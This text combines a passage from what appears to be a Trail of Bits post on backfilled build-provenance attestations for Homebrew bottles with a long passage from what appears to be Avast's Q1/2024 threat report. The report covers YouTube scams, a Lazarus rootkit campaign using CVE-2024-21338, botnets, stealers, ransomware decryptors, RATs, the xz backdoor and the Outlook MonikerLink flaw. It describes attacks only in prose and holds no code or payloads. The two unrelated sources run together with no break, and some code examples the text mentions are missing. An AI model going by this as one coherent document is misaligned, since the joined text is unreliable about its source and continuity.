Neither of these solutions was workable, so we sought a third. Instead of either rebuilding the world or selectively verifying, we decided to create a set of backfilled build attestations, signed by a completely different repository (our tap) and workflow. With a backfilled attestation behind each bottle, verification looks like a waterfall:
We first check for build provenance tied to the βupstreamβ repository with the expected workflow, i.e. Homebrew/homebrew-core with publish-commit-bottles.yml.
If the βupstreamβ provenance is not present, we check for a backfilled attestation before a specified cutoff date from the backfill identity, i.e. trailofbits/homebrew-brew-verify with backfill_signatures.yml.
If neither is present, then we produce a hard failure.
This gives us the best of both worlds: the backfill allows us to uniformly fail if no provenance or attestation is present (eliminating downgrades), without having to rebuild every old homebrew-core bottle. The cutoff date then adds an additional layer of assurance, preventing an attacker from attempting to use the backfill attestation to inject an unexpected bottle.
We expect the tail of backfilled bottle attestations to decrease over time, as formulae turn over towards newer versions. Once all reachable bottles are fully turned over, Homebrew will be able to remove the backfill check entirely and assert perfect provenance coverage!
Verifying provenance today
As mentioned above: this feature is in an early beta. Weβre still working out known performance and UX issues; as such, we do not recommend that ordinary users try it yet.
With that being said, adventuresome early adopters can give it a try with two different interfaces:
A dedicated brew verify command, available via our third-party tap
An early upstream integration into brew install itself.
For brew verify, simply install our third-party tap. Once installed, the brew verify subcommand will become usable:
Regardless of how you choose to experiment with this new features, certain caveats apply:
Both brew verify and brew install wrap the gh CLI internally, and will bootstrap gh locally if it isnβt already installed. We intend to replace our use of gh attestation with a pure-Ruby verifier in the medium term.
The build provenance beta depends on authenticated GitHub API endpoints, meaning that gh must have access to a suitable access credential. If you experience initial failures with brew verify or brew install, try running gh auth login or setting HOMEBREW_GITHUB_API_TOKEN to a personal access token with minimal permissions.
If you hit a bug or unexpected behavior while experimenting with brew install, please report it! Similarly, for brew verify: please send any reports directly to us.
Looking forward
Everything above concerns homebrew-core, the official repository of Homebrew formulae. But Homebrew also supports third-party repositories (βtapsβ), which provide a minorityβbutβsignificant number of overall bottle installs. These repositories also deserve build provenance, and we have ideas for accomplishing that!
Further out, we plan to take a stab at source provenance as well: Homebrewβs formulae already hash-pin their source artifacts, but we can go a step further and additionally assert that source artifacts are produced by the repository (or other signing identity) thatβs latent in their URL or otherwise embedded into the formula specification. This will compose nicely with GitHubβs artifact attestations, enabling a hypothetical DSL:
Stay tuned for further updates in this space and, as always, donβt hesitate to contact us! Weβre interested in collaborating on similar improvements for other open-source packagingecosystems, and would love to hear from you.
Last but not least, weβd like to offer our gratitude to Homebrewβs maintainers for their development and review throughout the process. Weβd also like to thank Dustin Ingram for his authorship and design on the original proposal, the GitHub Package Security team, as well as Michael Winser and the rest of Alpha-Omega for their vision and support for a better, more secure software supply chain.
1In the not-too-distant past, Homebrewβs bottles were produced by maintainers on their own development machines and uploaded to a shared Bintray account. Mike McQuaidβs 2023 talk provides an excellent overview on the history of Homebrewβs transition to CI/CD builds. 2Or easy to provide with self-hosted runners, which Homebrew uses for some builds.
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign
Foreword
Weβre pleased to present the latest edition of our report for the first quarter of 2024, which has been nothing short of eventful. Here are some highlights.
Not all heroes wear capes. Just a few weeks ago, developer Andres Freund disrupted a covert threat operation that had been running for over two years. The threat actors, who managed to insert a backdoor into the widely used open-source compression library XZ/liblzma, were stopped just in time by Andres. While the identity of the threat actors remains unknown, the potential ramifications of their actions could have been catastrophic β they were almost able to gain access to any Linux machine running an infected distribution. This incident has raised important questions about the security of open-source code and its integration into critical systems and applications.
Social engineering attacks continue to be the largest threat across platforms and continue to increase their share of threats. In the mobile device landscape, more than 90% of all threats blocked in the last quarter originated from scams and similar threat types. This trend is mirrored on desktop platforms, with 87% of threats falling into the same categories. Scams, in particular, have seen a significant surge (61% on mobile and 23% on desktop), fueled by malvertising and the proliferation of malicious push notifications. The risk of falling victim to these attacks has nearly doubled in certain regions, such as Ukraine, highlighting the global reach and impact of these malicious activities. Moreover, scam authors are deploying increasingly sophisticated tactics, including the use of deepfake technology, AI-manipulated audio synchronization, and the hijacking of popular YouTube channels to disseminate fraudulent content, amplifying the potential for financial harm.
Dating scams also continue to surge, particularly in North America and Europe, with Central Europe emerging as a hotspot for such activity. Phishing remains a persistent threat, steadily increasing over the past six quarters. Prevalent phishing campaigns are detailed further in this report.
On the desktop front, weβve uncovered a sophisticated APT campaign orchestrated by the Lazarus Group, targeting individuals in Asia with deceptive job offers. Furthermore, we discovered and reported to Microsoft an in-the-wild exploit within a Windows driver, subsequently utilized by a sophisticated rootkit in this campaign. Additionally, botnet activity has been a cause for concern β with notable updates observed in the Twizt botnet which now includes brute-forcing capabilities for Server Message Block (SMB) protocol credentials β and the expansion of the malicious DDosia project. Interestingly, the DDosia project faced frequent downtimes due to countermeasures taken by unidentified individuals. Furthermore, we successfully assisted Ukrainian CERT with the remediation of the DirtyMoe botnet.
The prevalence of Malware-as-a-Service (MaaS) stealers, exemplified by DarkGate and Luma, remains a significant threat. These malicious actors capitalize on every opportunity to deploy social engineering tactics to distribute malware.
Ransomware incidents also experienced a slight uptick in Q1/2024, notably marked by the LockBit ransomware making headlines for its initial takedown by law enforcement units, only to resurface shortly after. Furthermore, our researchers identified a new ransomware strain named HomuWitch and promptly responded by developing decryption tools to assist affected individuals. This effort supplements our previous creation, the Rhysida decryption tool, which continues to aid victims of Rhysida in recovering their files.
In the realm of remote access trojans (RATs), law enforcement units have successfully executed operations against notorious threats like the Warzone RAT, resulting in several arrests. This decisive action has already yielded tangible results, as evidenced by our telemetry data.
On the mobile front, weβve witnessed several intriguing developments, including the resurgence of adware on the PlayStore, the emergence of MoqHao, a banker strain capable of auto-starting on victim devices, and the proliferation of GoldPickaxe, which attempts to steal facial recognition biometrics for fraudulent activities. Additionally, state-sponsored spyware continues to pose a threat to citizens.
Thank you for your continued trust in Avast. Stay safe and secure.
Jakub KΕoustek, Malware Research Director
Methodology
This report is structured into two main sections: Desktop-related threats, where we describe our intelligence around attacks targeting the Windows, Linux, and Mac operating systems, with a specific emphasis on web-related threats, and Mobile-related threats, where we describe the attacks focusing on Android and iOS operating systems.
We use the term βrisk ratioβ in this report to denote the severity of specific threats. This is calculated as a monthly average of βNumber of attacked users / Number of active users in a given country.β Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.
A blocked attack is defined as a unique combination of the protected user and a blocked threat identifier within the specified time frame.
Featured Story: YouTube β the New Battleground for Phishing, Malvertising, and CryptoscamsΒ
YouTube, with its 2.5 billion users, has become a trusted and significant target for malvertising. The combination of automated advertising systems and user-generated content provides a gateway for cybercriminals to bypass conventional security measures, making YouTube a potent channel for deploying phishing and malware. Notable threats on the platform include credential stealers like Lumma and Redline, phishing and scam landing pages, and malicious software disguised as legitimate software or updates. Additionally, YouTube serves as a conduit to Traffic Distribution Systems (TDS), directing users to malicious sites and supporting scams ranging from fake giveaways to investment schemes.
Our web scanning endpoints actively block thousands of HTTP requests, daily, that are redirected from YouTube as our users view content. This activity reflects a worrying trend:Β
4 millions unique users were protected against threats on YouTube in 2023Β
Approx 500k unique users per month protected in Q1/2024
The rise of DeepFake videos in YouTube poses significant risks by realistically mimicking people or events, misleading viewers, and spreading disinformation. In Q1 we observed multiple compromised YouTube accounts with more than 50 million subscribers hijacked to spread Cryptoscam Deefake videos (more about this topic is described below in the Scam section).Β
Threat actors frequently utilize automated uploads and Search Engine Optimization (SEO) poisoning to enhance the visibility of harmful content. Additionally, fake comments are rampant, deceiving viewers,Β promoting dangerous links, and exploiting YouTubeβs algorithms and user engagement to disseminate cyber threats.
There are numbers of ways in which YouTube can be exploited to disseminate threats. Observed basic Tactics and Procedures (TTP) on YouTube include:
Phishing Campaigns Targeting Creators: Attackers send personalized emails to YouTube creators proposing fraudulent collaboration opportunities. Once trust is established, they send links to malware under the guise of software needed for collaboration, often leading to cookie theft or account compromise.Β
Compromised Video Descriptions: Attackers upload videos with descriptions containing malicious links, masquerading as legitimate software downloads related to gaming, productivity tools, or even antivirus programs, tricking users into downloading malware
Channel Hijacking for Spreading Threats: By gaining control of YouTube channels through phishing or malware, attackers repurpose these channels to promote various types of threats, such as cryptocurrency scams, often involving fake giveaways that require an initial deposit from viewers.
Exploitation of Software Brands and Legitimate-Looking Domains: Attackers create websites that mimic reputable companies and offer illegitimate downloadable software, exploiting usersβ trust.
Social Engineering via Video Content: Attackers post tutorial videos or offers for cracked software, guiding users to download malware disguised as helpful tools. This tactic takes advantage of users seeking free access to otherwise paid services or software, leveraging YouTubeβs search and recommendation algorithms to target potential victims.
Michael Saylor, co-founder of MicroStrategy, in deep fake crypto scam video
David Jursa, Malware Researcher Luis Corrons, Security Evangelist
Desktop-Related Threats
Advanced Persistent Threats (APTs): Lazarus Group in the Spotlight
An Advanced Persistent Threat (APT) is a type of cyberattack that is conducted by highly skilled and determined hackers who have the resources and expertise to penetrate a targetβs network and maintain a long-term presence undetected.
We discovered a Lazarus Group campaign targeting specific individuals in Asia with misleading job offers. The precise intent of the campaign remains unknown, but the selective nature of these attacks indicates a focused interest in individuals possessing technical expertise. We suspect that these technically skilled individuals might have connections to companies involved in the gambling or betting industry, aligning with Lazarus Groupβs financial motivations.
We believe the Lazarus Group used fabricated job offers to gain access to the personal computers of these victims who also used these devices for work purposes. It is likely that, a few days after the initial compromise, the attackers realized the victims had access to their company networks. Consequently, Lazarus employed sophisticated rootkit technologies to evade security measures and some security vendors.
This approach reflects the Lazarus Groupβs historical tactics of exploiting vulnerable drivers and employing advanced rootkit techniques to disrupt security systems and maintain persistent access.
In this specific instance, Lazarus exploited a vulnerability in the standard Windows driver, appid.sys (CVE-2024-21338), to neutralize security software. Further details on this vulnerability can be found in our related blog post.
The complexity of these attack chains suggests that Lazarus devoted substantial resources to their planning and execution. Before executing the attack, Lazarus carefully prepared by deploying fileless malware and encrypting their tools directly onto the hard drives, as detailed in the blog post and as we recently presented at Black Hat Asia 2024 conference.
Communication of the Lazarus Groupβs toolkit with C&C servers
The careful and highly targeted choice of victims suggests that establishing some level of trust or connection was likely necessary before initiating the malware. The deployment of such a sophisticated arsenal, coupled with the exploit, highlights significant strategic foresight and resource commitment.
Luigino Camastra, Malware Researcher Igor Morgenstern, Malware Researcher
Bots (With a Twist)
Bots are threats mainly interested in securing long-term access to devices with the aim of utilizing their resources, be it remote control, spam distribution, or denial-of-service (DoS) attacks.
To start on a lighter note, the biggest news in the botnet landscape was an unfortunate article in Swiss media outlet Aarguaer Zeitung which claimed a large-scale DDoS attack of millions of toothbrushes running Java. While the thought of a web-connected toothbrush running Java (which were also allegedly DDosing some random Swiss webpage) is really scary, it has been soon rectified as an inaccurate report and there was no such army of Pro-Russian toothbrushes, as the initial report suggested.
Now, unfortunately, onto the more serious note. On the geopolitical side of the threat landscape, Ukrainian state-owned enterprises have been significantly hit with DirtMoe. Due to our extensive research on DirtMoe, CERT-UA reached out to us to assist them with the remediation. Based on the experience from this successful remediation, an advisory on DirtyMoe was published by CERT-UA.
Twizt botnet has received a new module in its update providing functionality that fuels its sextortion campaign. This module relies on the common strategy of extorting the user with fake and sensitive information that was allegedly recovered from their device or account. In the case of the former, the threat actor usually refers to a device infected with RAT, in the case of the latter, the message usually contains a fake sender header and a password to give the impression that the userβs mail account has been hacked. Nevertheless, all the sent information is fabricated, and the password was quite likely taken from one of the leaked password databases that are circulating the dark web.
Sextortion email referencing infected device
Sextortion email containing a password and a reference to RAT
Last year, Twizt started bruteforcing Virtual Network Computing (VNC) credentials. At the beginning of the year, they switched to brute-forcing SMB credentials, instead. Twizt contains a hard-coded list of username/password pairs that are tried against a randomly generated target. Successful authentications are then reported to its command-and-control (C&C) server.
Our usual story on DDosia has a very surprising twist this quarter. Presumably, someone was actively targeting the DDosia C&C infrastructure, repeatedly causing outages in the proxy servers fronting real C&C servers. This resulted in rapid infrastructure changes in this outer layer, with every new proxy C&C having an approximate lifetime of 2 days before being unavailable again. Due to the absence of a client update mechanism in case of C&C outage, this forced the project owners to produce new clients every few days. Later, they started distributing new clients exclusively via private messages, presumably to reduce information exposure.
Breakdown of top-level domains targeted by DDosia
Targets published on DDosiaβs Telegram group
The requirement to manually update DDosiaβs binary with each update along with frequent C&C outages resulted in a significant decrease in the impact of their attacks. This has prompted a heated backlash on the projectβs Telegram channel where βpatriotic activistsβ started complaining that these issues are seriously impacting their cash-flow.Β
This was particularly notable around February 19 when eight proxy C&Cs were shut down for five days. Even after this date, they were not able to return to their previous efficacy. The only peak during Q1/2024 is an attack at the end of March when DDosia targeted services associated with the Luxembourg government. While the number of successful targets seems to be rather high, it targeted infrastructure that was hosted on only 3 IP addresses with many subdomains. These turbulent changes were crowned by a move to a different Telegram group called βDDoSia Projectβ on March 7 with the original group being removed. While, up to that date, the original group was growing, ending with approximately 20,000 members, the new group started up with only around 12,000 members and soon continued in this downward trend.
DDosia Telegram group members
While in the previous quarter DDosia was mostly focusing on banks, during the first quarter of 2024 DDosia focused mostly on various industry consortia, courts, press agencies, CERTs, and transport and logistic companies. The underlying logic stayed mostly the same β finding targets within countries that went against Russian interests.
As for the trends in the whole botnet landscape, many of the prevalent strains have stagnated. Still, weβve seen several bigger shifts in their prevalence, including increased activity of BetaBot (13%). On the other hand, most of the other strains seem to be in decline with the following strains seeing the biggest drops: Pikabot (-48%), Tofsee (-31%), MyKings (-21%), and Dridex (-21%).
Global risk ratio of bots in Q4/2023 and Q1/2024
Adolf StΕeda, Malware Researcher
Coinminers Continue to Decline
Coinminers are programs that use a deviceβs hardware resources to verify cryptocurrency transactions and earn cryptocurrency as compensation. However, in the world of malware, coinminers silently hijack a victimβs computer resources to generate cryptocurrency for an attacker. Regardless of whether a coinminer is legitimate or malware, itβs important to follow our guidelines.
In the previous quarter, we observed a continued decline in the prevalence of coinminers. This downward trend persisted into Q1/2024, where the risk ratio decreased by a substantial 28%. This decrease was influenced by a slight reduction in the coinminer malware share of XMRig, which had surged in the previous quarter. However, nearly all other major coinminers actually increased in activity, thereby expanding their share.
Global risk ratio for coinminers in Q1/2024
After the surge in the USA and Turkey the previous quarter, the situation calmed down a bit and we observed 39% decrease in risk ratio both countries. According to our data, more significant declines happened in India (22%), Egypt (19%), and Pakistan (13%). In total, the biggest risk of getting infected by a coinminers is still in Madagascar (2.18% risk ratio), Turkey (1.47%), Pakistan (1.35%), and Egypt (1.14%).
In the graph below, we can observe a steady decline in coinmining activities.
Daily risk ratio in our user base regarding coinminers in Q1/2024
XMRig, the long-time most popular coinminer, decreased in coinminer malware share by 6% this quarter. Yet, it still holds 60% of the total share. All other major coinminers saw an increase in their activity, including web miners (5% increase), CoinBitMiner (24%), FakeKMSminer (37%), among others. On the other hand, SilentCryptoMiner lost 58% share this quarter.
The most common coinminers with their malware share in Q1/2024 were:
XMRig (59.53%)
Web miners (20.20%)
CoinBitMiner (2.67%)
FakeKMSminer (2.03%)
NeoScrypt (1.75%)
CoinHelper (1.05%)
VMiner (0.86%)
SilentCryptoMiner (0.84%)
Jan RubΓn, Malware Researcher
Information Stealers are Still Dominated by AgentTesla
Information stealers are dedicated to stealing anything of value from the victimβs device. Typically, they focus on stored credentials, cryptocurrencies, browser sessions/cookies, browser passwords and private documents.
AgentTesla, traditionally the most prevalent information stealer we protect our users against, continued to attack users by leveraging email campaigns. One such campaign targeted Czechia, spreading the stealer via malicious attachments.
Email containing AgentTesla in attachments (AvastThreatLabs)
TimbreStealer, targeting almost explicitly users in Mexico, is a newcomer in the information stealers landscape. The malware is quite advanced and multi-modular, containing techniques like Heavenβs gate, among many others. It also introduces many tricks for preventing execution in sandboxes and proper debugging.
Malware-as-a-Service (MaaS) stealers continue to thrive, finding new distribution methods whenever possible. For example, DarkGate was observed to be spread via Microsoft Teams, using phishing. Furthermore, from the more technical perspective, DarkGate was exploiting Microsoft Windows SmartScreen (CVE-2024-21412).
We have also observed a DarkGate campaign distributed via malicious PDF files, abusing crypto exchange and the WebDAV server. The malware delivery was done using an InternetShortcut link (.URL file), downloading the content from an opendir.
On the other hand, Lumma Stealer, which is yet another MaaS stealer, continues to spread via cracked software propagated on YouTube, using fake tutorials to mislead victims. This further emphasizes that such strains β and their creators β never miss an opportunity to leverage social engineering to distribute malware.
With regards to macOS, AtomicStealer, also known as AMOS, saw a consistent rise in occurrences on this platform during Q1/2024. This typically obfuscated malware is known for stealing passwords, cryptocurrency wallets, and cookies. It often infiltrates systems via counterfeit applications or through Google Ads poisoning. The existence of multiple generations of this threat suggests that it is likely to persist in the future, which is further underlined by its new version that was carried by a malvertising campaign in the beginning of the year.
In terms of Linux, Python information stealers were the more prevalent strains of this type with well-known malware families like Spidey, Creal, Wasp or PirateStealer. Additionally, in this quarter we uncovered a new malware strain identified as PassSniff/Putin and written in C++ that, instead of stealing the passwords from disk, steals the passwords by sniffing the HTTP traffic using both, generic rules and specific rules targeting popular services and applications.
Statistics
Overall, the global risk ratio decreased by 8% in Q1/2024 for information stealers. However, many popular stealers further increased their reach, including AgentTesla, Stealc, Fareit, and ViperSoftX.
Daily risk ratio in our user base regarding information stealers in Q1/2024
Each of the countries where we observe the risk ratio with regards to information stealers and where we have more significant userbase thankfully experienced a decrease in activity compared to the previous quarter:
Turkey (2.29%) with 23% Q/Q decrease
Pakistan (2.05%) with 11% Q/Q decrease
Egypt (1.78%) with 10% Q/Q decrease
On the other hand, we also measured increases in activity in Mexico and Czechia, following the aforementioned TimbreStealer and AgentTesla campaigns, were the risk ratio increased by 25% and 14%, respectively.
Global risk ratio for information stealers in Q1/2024
AgentTesla, the most prevalent information stealer according to our data, has increased its malware share by 17%. Its campaigns primarily target Central Europe and both North and South America. As a result, it now holds a significant 30.31% of the malware share. Notably, almost every bigger information stealer experienced an increase in activity, including Fareit (34% increase), Stealc (33%), ViperSoftX (28%), and Azorult (14%). FormBookβs share decreased by 32%, as well as Lokibotβs by 50%, balancing the scales of the overall activity of information stealers.
The most common information stealers with their malware shares in Q1/2024 were:
AgentTesla (30.31%)
Fareit (7.55%)
FormBook (6.92%)
RedLine (4.37%)
Stealc (2.81%)
ViperSoftX (2.28%)
Azorult (1.93%)
ClipBanker (1.72%)
Raccoon (1.56%)
Lokibot (1.41%)
Rhadamanthys (1.36%)
Jan RubΓn, Malware Researcher David Γlvarez, Malware Analyst
Ransomware: Fighting it Back
Ransomware is any type of extorting malware. The most common subtype is the one that encrypts documents, photos, videos, databases, and other files on the victimβs PC. Those files become unusable without decrypting them first. To decrypt the files, attackers demand money, βransomβ, hence the term ransomware.
The LockBit Story
In the previous threat report, we discussed new ransomware attacks. One of the top ransomware strains (or gangs, if you wish) is LockBit, which continues its encryption and extortion attacks with an undiminished intensity.
Because of the notoriety of LockBit, their β albeit brief β takedown in Q1/2024 was watched closely by the public.Β On February 19, operation Cronos was announced, which was a joint operation between law enforcement agencies in 10 countries. As a part of this operation, the FBI successfully breached the LockBit infrastructure, secured about 1000 private encryption keys and released a public decryptor. The following is the timeline surrounding the initiative:
Feb 19: Operation Cronos was unveiled. LockBit leak site was replaced by a landing page from the associated law enforcement agencies:
The main panel was replaced with a version augmented by the authorities, outing the criminality of ransomware operators:
For four days, there was no information about new victims of the LockBit ransomware
Feb 24: A long message from LockBit was published by DarkWebInformer. This message explained what happened and questioned the law enforcement agenciesβ success. The author of the message explains that some of his servers were running an outdated version of PHP and hence were vulnerable to CVE-2023-3824.
Feb 25: The LockBit leak site was restored, with the FBI now shown as one of the victims. Additionally, the information about leaked data from Fulton County was re-uploaded. Note that the Fulton County Government was allegedly attacked by LockBit on Feb 14 and the leaked data was mentioned in LockBitβs message as the reason that the FBI stopped the operation instead of silently watching the servers and exfiltrating LockBitβs data increasingly, as their criminal activities continued.
A tool for decrypting LockBit-encrypted data using one of 1000 seized encryption keys is. The importance of these encryption keys has been questioned by the LockBit operator himself, saying (quote) βNote that the vast majority of unprotected decryptors are from partners who encrypt brute force dedicas and spam single computers, taking $2000 ransomsβ (end quote). Users attacked by LockBit ransomware may use the tool to verify if their data can be decrypted using one of the keys that were seized during the Cronos operation.
Another LockBit-related incident happened at the beginning of 2024, which demonstrates some of the ransomware operatorsβ modus operandi. After LockBitSupp gained access to an unspecified company, encrypted their data, and received ransom payout, he that provided access to the network.
This little incident shows what ransomware operators do to penetrate a company:
Ransomware operator βbuys an accessβ which means obtaining information about a company, its vulnerabilities and how to breach its network.
Then the operator maps the company network and eventually deploys the ransomware.
When the attacked company pays the ransom, the βaccess sellerβ gets paid for the access.
Ransomware Decryptors
As a part of the ongoing battle against ransomware, Avast released two ransomware decryptors: HomuWitch and Rhysida.
HomuWitch
HomuWitch is a ransomware that stayed under the radar since July 2023, because it targets end users with smaller ransom demands (25 β 75 USD). Searching for pirated software is the most common infection vector β instead of the desired software, users may download SmokeLoader backdoor, which later installs malicious dropper for the ransomware payload.
Unlike most ransomware strains that perform file encryption, HomuWitch also adds compression, so the encrypted files are smaller than their originals. When executed, HomuWitch searches local drives and user folders (Pictures, Downloads, Documents). All files of interest (.pdf, .doc, .docx, .ppt, .pptx, .xls, .py, .rar, .zip, .7z, .txt, .mp4, .JPG, .PNG, .HEIC, .csv) are encrypted and renamed to the .homuencrypted extension:
While analyzing this ransomware, we found a vulnerability that allows affected users to recover their files for free. We released free decryptor that is available on our website.
Rhysida
Rhysida is another ransomware strain defeated by the free decryption tool. This ransomware has been active since May 2023 and focuses on the enterprise sector. During summer, we discovered that this ransomware strain is decryptable without having the private RSA key, so we have been helping people who were attacked by the Rhysida ransomware.
In February 2024, Korean researchers also discovered that vulnerability and released their decryption tool publicly. It is always unfortunate to publish detailed information about the details of a vulnerability β we would like to ask fellow malware researchers not to do so and focus more on helping people affected by ransomware attacks.
Now that the details of the vulnerability are public, we also released a free decryption tool that is available both on our website and as part of the NoMoreRansom project.
Statistics
The most prevalent ransomware strains that we block in our userbase are listed below. As opposed to more popular threats like LockBit, Akira or BlackCat, you rarely read about those strains in media because β instead of attacking a large company and demanding millions of USD as ransom β these strains focus on either individual users or small businesses, and they demand ransoms that are in the thousands of dollars range.
WannaCry (21% of ransomware share)
Enigma (12%)
STOP (12%)
Mallox (aka TargetCompany) (3%)
DarkSide (2%)
Cryptonite (1%)
The overall ransomware risk ratio in our user base is showing an increase when compared to the previous quarter. The situation started escalating in March 2024:
The ransomware risk ratio per country is depicted on the following map. We have noticed a significant increase in Bulgaria, Japan, Czechia, and Hungary where the risk ratio more than doubled Q/Q.
Global risk ratio for ransomware in Q1/2024
Ladislav Zezula, Malware Researcher Jakub KΕoustek, Malware Research Director
Remote Access Trojans (RATs): The End of Warzone
A Remote Access Trojan (RAT) is a type of malicious software that allows unauthorized individuals to gain remote control over a victimβs computer or device. RATs are typically spread through social engineering techniques, such as phishing emails or infected file downloads. Once installed, RATs grant the attacker complete access to the victimβs device, enabling them to execute various malicious activities, such as spying, data theft, remote surveillance, and even taking control of the victimβs webcam and microphone.
Similarly to Q1/2023 and the Netwire takedown, this year also begins with a takedown action against one of the major players in the RAT scene β theΒ Warzone RAT was taken down at the beginning of February. According to our data, the effect was immediately visible as a sudden drop in the number of detected attacks by Warzone. Besides this takedown, it was a rather slow start to the year with only a few notable events in the RAT sphere.
Daily risk ratio in our user base regarding RATs in Q4/2023 and Q1/2024
Compared to Q4/2023, the global risk ratio in the first quarter of 2024 is following a downward trend. There are several reasons for this decline. The big players Remcos, njRAT, and AsyncRat seem to have eased off a little and the number of attacks in Q1/2024 was lower than what we typically see. The takedown action against Warzone might have caused some RAT operators to halt or pause their activities. While we see increased activity of less prevalent malware strains, this isnβt enough to compensate the overall attack numbers.
Global risk ratio for RATs in Q1/2024
The top 3 countries and RATs have not changed. We still see the highest risk ratio in Afghanistan, Iraq and Yemen, with HWorm and njRAT as the most active threats there.
The biggest increase in risk ratio was observed in Canada (+69%) due to increased activity of XWorm in February. This led to XWorm increasing its malware share by 378% which makes it the most prevalent RAT in Canada. The second highest share is in New Zealand (+33%) followed by Switzerland (+14%). Remcos was the dominant force in both countries. Despite this rise of risk ratio, Switzerland is still among the safest countries regarding RAT attacks.
The most prevalent remote access trojan strains in our userbase are as follows:
HWorm
Remcos
njRAT
AsyncRat
QuasarRAT
Warzone
FlawedAmmyy
XWorm
NanoCore
DarkComet
Although the overall number of detected attacks by Remcos slightly dropped, it is still very active. We recently warned about a campaign targeting most of Eastern Europe; this campaign was created in the Russian language and used a common lure βInvoice payment confirmationβ.
We already mentioned XWorm in relation to Canada, however it also managed to increase its presence in most parts of the world. We also see XWorm frequently releasing new versions.
On February 7, an international operation targeted the Warzone RAT resulting in the seizure of four domains, including the primary site βwarzone.wsβ, and server infrastructure. One suspect was arrested in Malta and another in Nigeria. The FBI led the operation with assistance from Europol, the U.S. Department of Justice, and local law enforcement agencies. The suspects are accused of selling and advertising the RAT, providing support, and unauthorized damage to protected computers.
Domain warzone.ws taken down by the authorities
FortiGuard Labs also uncovered a phishing campaign spreading a new RAT, VCURMS. The campaign uses a downloader with payloads stored on public services like AWS and GitHub. There are two known payloads β the new VCURMS and STRRAT. STRRAT is also a remote access trojan which appeared in 2020. The interesting part of VCURMS is its unusual command and control channel. It communicates using emails with a Proton Mail address. Like STRRAT, VCURMS is also coded in Java. Another notable feature is its infostealer module which looks similar to RudeStealer.
Phylum and Sonatype discovered another supply chain attack in Q1/2024. Both teams found malicious packages in PyPI. These packages deploy a RAT that can also steal information from infected machines. Phylum named this threat βpoweRATβ, because it relies on PowerShell in the early stages. Both reports mention the following packages as affected: pyrologin, easytimestamp, discorder, discord-dev, style.py and pythonstyles. Sonatype followed up on this story, adding several more packages to the list and showing how this threat has evolved. Communication with the C&C server happens via a Cloudflare Tunnel created from the infected machine, which means the malware does not need to modify any firewall settings. The features of RAT and information-stealing components are common on their own β however, when they combine, they create quiteΒ a dangerous threat. Phylum refers to it as a βRAT on steroidsβ and Sonatype as βRAT mutantβ.
OndΕej MokoΕ‘, Malware Researcher
Vulnerabilities and Exploits: An Actively Exploited Admin-to-Kernel Zero-Day
Exploits take advantage of flaws in legitimate software to perform actions that should not be allowed. They are typically categorized into remote code execution (RCE) exploits, which allow attackers to infect another machine, and local privilege escalation (LPE) exploits, which allow attackers to take more control of a partially infected machine.
In the February Patch Tuesday update, Microsoft patched CVE-2024-21338, a zero-day admin-to-kernel vulnerability discovered by Avast researchers. This zero-day was initially exploited in the wild by the Lazarus Group, who used it to enable an updated version of their FudModule data-only rootkit. This marked a significant improvement in capabilities, as previous versions of the FudModule rootkit were enabled by targeting known vulnerable drivers for BYOVD (Bring Your Own Vulnerable Driver) attacks.Β
Upgrading from BYOVD techniques to a zero-day in a built-in driver made the entire attack significantly stealthier, however, this wasnβt the only upgrade. Lazarus also revamped the rootkit functionality, targeting registry callbacks, object callbacks, process/thread/image callbacks, file system minifilters, Windows Filtering Platform, Event Tracing for Windows, and image verification callbacks. Additionally, the threat actors implemented a noteworthy handle table entry manipulation technique, attempting to suspend critical processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. For a deeper understanding of this attack, we recommend reading our two technical blogposts or watching our Black Hat Asia 2024 talk.
The decompiled βmainβ function of the FudModule rootkit, executing the exploit and all the individual rootkit techniques.
In other news, the open-source world was shocked by the discovery of a backdoor in the xz/liblzma compression library. This backdoor was discovered by software engineer Andres Freund, who noticed that failing ssh logins were consuming suspicious amounts of CPU, and did the world a huge favor by deciding to investigate the root cause. The attacker(s) went by the name Jia Tan (their exact affiliation/motivation remain unclear) and demonstrated a remarkable level of patience, slowly building up trust by contributing to the open-source project for over two years. Eventually, they decided to strike and β over a number of commits β introduced the backdoor, the ultimate goal of which was to allow remote SSH logins to those with the possession of the right private key (CVE-2024-3094).Β
Fortunately, the backdoor was discovered relatively early, so the attackers didnβt have enough time to get the malicious code merged into major Linux distributions like Debian or Red Hat. This was a close call, however, which should be very alarming, as this could have easily been one of the biggest security incidents that we have seen in recent years. While open-source code is often regarded as more trustworthy than its closed-source counterpart, this attack demonstrates that it comes with its own challenges. Many critical open-source projects are maintained with little funding by overworked volunteers, which might unfortunately make them vulnerable to similar attacks.
Another interesting discovery was related to hyperlinks in Outlook. While Outlook would, under usual circumstances, not follow βfile://β protocol links to remote resources, Haifei Li of Check Point Research discovered that just adding an extra exclamation mark (β!β) followed by some arbitrary characters might change this behavior completely. This vulnerability was assigned CVE-2024-21413 and dubbed MonikerLink, as the exclamation mark essentially turns the link into a composite moniker. When a user received an email and clicked on such a link, the remote file would be fetched and possibly parsed in the background.Β
Interestingly, the impact of this is twofold. First, following the link to load a resource from a remote SMB server represents yet another way to force NTLM authentication, allowing the remote server to capture NTLMv2 hashes. Second, an attacker might use this to trigger some vulnerable code, as the fetched resource might be opened in the background, attempting to look up the item moniker (the string appended after the exclamation mark). For instance, the Check Point blog demonstrated this on an RTF file, which would get opened in Microsoft Word outside protected view, representing a very sneaky 1-click vector to deliver an RTF exploit.
Jan VojtΔΕ‘ek, Malware Researcher
Web Threats
The significance of web threats can be well seen not only in the numericalΒ statistics but also in the creativity of the scammers themselves. We see scammers trying to take advantage of different trends in different groups. These cybercriminals are using the latest technology in the field of AI, or they are not afraid to invest in their fraudulent practices to improve the sophistication of their scams through other methods.Β
Last quarter, we reported that scams, together with phishing and malvertising, accounted for more than 75% of all threats blocked by Avast throughout the year. This quarter we have blockedΒ over 80% for the same type of threats. This indicates a rather interesting β and very scam-ridden β start to the year.
Scams Everywhere, Including Video
A scam is a type of threat that aims to trick users into giving an attacker their personal information or money. We track diverse types of scams which are listed below.
In our Q4/2023 report, we pointed out that scam activity is increasing significantly. At that time, we saw that one of the main reasons was the high rate of malvertising campaigns. This trend has continued in Q1/2024, with the activity level from the previous peak.Β
Daily risk ratio of scam in Q4/2023 and Q1/2024
